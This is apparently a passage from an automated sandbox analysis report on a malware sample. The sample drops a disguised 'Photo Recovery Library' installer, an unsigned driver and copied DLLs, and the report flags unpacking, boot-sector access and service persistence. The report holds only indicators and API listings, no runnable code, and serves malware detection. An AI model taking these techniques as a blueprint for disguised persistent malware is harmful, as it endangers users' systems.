            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Photo Recovery Library_is1Jump to behavior

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeUnpacked PE file: 0.2.dxRwXy19pq.exe.400000.0.unpack "YR:EW;b.bbb:EW;Unknown_Section2:W; vs "YR:ER;b.bbb:ER;Unknown_Section2:W;
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeUnpacked PE file: 14.2.photorecoverylib59.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeUnpacked PE file: 14.2.photorecoverylib59.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_00402890 LoadLibraryA,GetProcAddress,GetCurrentThread,FreeLibrary,0_2_00402890
            Source: initial sampleStatic PE information: section where entry point is pointing to: b.bbb
            Source: dxRwXy19pq.exeStatic PE information: section name: "YR
            Source: dxRwXy19pq.exeStatic PE information: section name: b.bbb
            Source: dxRwXy19pq.exeStatic PE information: section name: bbS
            Source: VzUtW_3288.sys.5.drStatic PE information: section name: css0
            Source: is-N40N4.tmp.13.drStatic PE information: section name: /4
            Source: is-N40N4.tmp.13.drStatic PE information: section name: /19
            Source: is-N40N4.tmp.13.drStatic PE information: section name: /35
            Source: is-N40N4.tmp.13.drStatic PE information: section name: /51
            Source: is-N40N4.tmp.13.drStatic PE information: section name: /63
            Source: is-N40N4.tmp.13.drStatic PE information: section name: /77
            Source: is-N40N4.tmp.13.drStatic PE information: section name: /89
            Source: is-N40N4.tmp.13.drStatic PE information: section name: /102
            Source: is-N40N4.tmp.13.drStatic PE information: section name: /113
            Source: is-N40N4.tmp.13.drStatic PE information: section name: /124
            Source: sqlite3.dll.14.drStatic PE information: section name: /4
            Source: sqlite3.dll.14.drStatic PE information: section name: /19
            Source: sqlite3.dll.14.drStatic PE information: section name: /35
            Source: sqlite3.dll.14.drStatic PE information: section name: /51
            Source: sqlite3.dll.14.drStatic PE information: section name: /63
            Source: sqlite3.dll.14.drStatic PE information: section name: /77
            Source: sqlite3.dll.14.drStatic PE information: section name: /89
            Source: sqlite3.dll.14.drStatic PE information: section name: /102
            Source: sqlite3.dll.14.drStatic PE information: section name: /113
            Source: sqlite3.dll.14.drStatic PE information: section name: /124
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeCode function: 2_2_00007FF88B4C4802 push eax; ret 2_2_00007FF88B4C4811
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeCode function: 2_2_00007FF88B4C00BD pushad ; iretd 2_2_00007FF88B4C00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF88A9FD2A5 pushad ; iretd 10_2_00007FF88A9FD2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF88AB100BD pushad ; iretd 10_2_00007FF88AB100C1
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_004065C8 push 00406605h; ret 12_2_004065FD
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_004040B5 push eax; ret 12_2_004040F1
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_00408104 push ecx; mov dword ptr [esp], eax12_2_00408109
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_00404185 push 00404391h; ret 12_2_00404389
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_00404206 push 00404391h; ret 12_2_00404389
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_0040C218 push eax; ret 12_2_0040C219
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_004042E8 push 00404391h; ret 12_2_00404389
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_00404283 push 00404391h; ret 12_2_00404389
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_00408F38 push 00408F6Bh; ret 12_2_00408F63
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004849F4 push 00484B02h; ret 13_2_00484AFA
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0040995C push 00409999h; ret 13_2_00409991
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00458060 push 00458098h; ret 13_2_00458090
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004860E4 push ecx; mov dword ptr [esp], ecx13_2_004860E9
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004062C4 push ecx; mov dword ptr [esp], eax13_2_004062C5
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004783C8 push ecx; mov dword ptr [esp], edx13_2_004783C9
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004104F0 push ecx; mov dword ptr [esp], edx13_2_004104F5
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00412938 push 0041299Bh; ret 13_2_00412993
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0049AD44 pushad ; retf 13_2_0049AD53
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0040CE48 push ecx; mov dword ptr [esp], edx13_2_0040CE4A
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00459378 push 004593BCh; ret 13_2_004593B4
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0040F3A8 push ecx; mov dword ptr [esp], edx13_2_0040F3AA
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0040546D push eax; ret 13_2_004054A9
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004434B4 push ecx; mov dword ptr [esp], ecx13_2_004434B8
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0040553D push 00405749h; ret 13_2_00405741
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004055BE push 00405749h; ret 13_2_00405741
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0040563B push 00405749h; ret 13_2_00405741
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004056A0 push 00405749h; ret 13_2_00405741
            Source: dxRwXy19pq.exeStatic PE information: section name: b.bbb entropy: 7.9262045404820025
            Source: VzUtW_3288.sys.5.drStatic PE information: section name: .text entropy: 7.166404761662683
            Source: is-G5VHU.tmp.13.drStatic PE information: section name: .text entropy: 6.90903234258047

            Persistence and Installation Behavior

            barindex
            Contains functionality to infect the boot sector
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive014_2_02D3E8B2
            Sample is not signed and drops a device driver
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeFile created: C:\Windows\Temp\VzUtW_3288.sysJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\libGLESv2.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\icuuc51.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NKCMI.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\msvcp100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-9CIKO.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeFile created: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-9TUU2.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-G5VHU.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-N40N4.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeFile created: C:\ProgramData\PhotoRecoveryLib\sqlite3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\msvcr100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-HHAV6.tmpJump to dropped file
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\silk[1].exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeFile created: C:\Windows\Temp\VzUtW_3288.sysJump to dropped file
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeFile created: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-4V98D.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeFile created: C:\Users\user\AppData\Local\Temp\d.ghSlh.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\libEGL.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\sqlite3.dll (copy)Jump to dropped file
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\001[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeFile created: C:\ProgramData\PhotoRecoveryLib\PhotoRecoveryLib.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\Qt5Concurrent.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-DLELP.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NKCMI.tmp\_isetup\_iscrypt.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\uninstall\is-PDB6I.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\Qt5PrintSupport.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-C06F8.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-0N6LU.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\uninstall\unins000.exe (copy)Jump to dropped file
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeFile created: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\icuin51.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NKCMI.tmp\_isetup\_shfoldr.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeFile created: C:\ProgramData\PhotoRecoveryLib\PhotoRecoveryLib.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeFile created: C:\ProgramData\PhotoRecoveryLib\sqlite3.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeFile created: C:\Windows\Temp\VzUtW_3288.sysJump to dropped file

            Boot Survival

            barindex
            Contains functionality to infect the boot sector
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive014_2_02D3E8B2
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\IV16YfWt_3288Jump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_0040DCE3 StartServiceCtrlDispatcherA,14_2_0040DCE3

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,13_2_00423C1C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,13_2_00423C1C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004241EC IsIconic,SetActiveWindow,SetFocus,13_2_004241EC
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004241A4 IsIconic,SetActiveWindow,13_2_004241A4
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,13_2_00418394
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004843A8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,13_2_004843A8
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,13_2_0042286C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0042F2F0 IsIconic,GetWindowLongA,GetWindowLongA,GetActiveWindow,MessageBoxA,SetActiveWindow,GetActiveWindow,MessageBoxA,SetActiveWindow,13_2_0042F2F0
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_004175A8 IsIconic,GetCapture,13_2_004175A8
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00417CDE IsIconic,SetWindowPos,13_2_00417CDE
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,13_2_00417CE0
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,13_2_0041F128
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
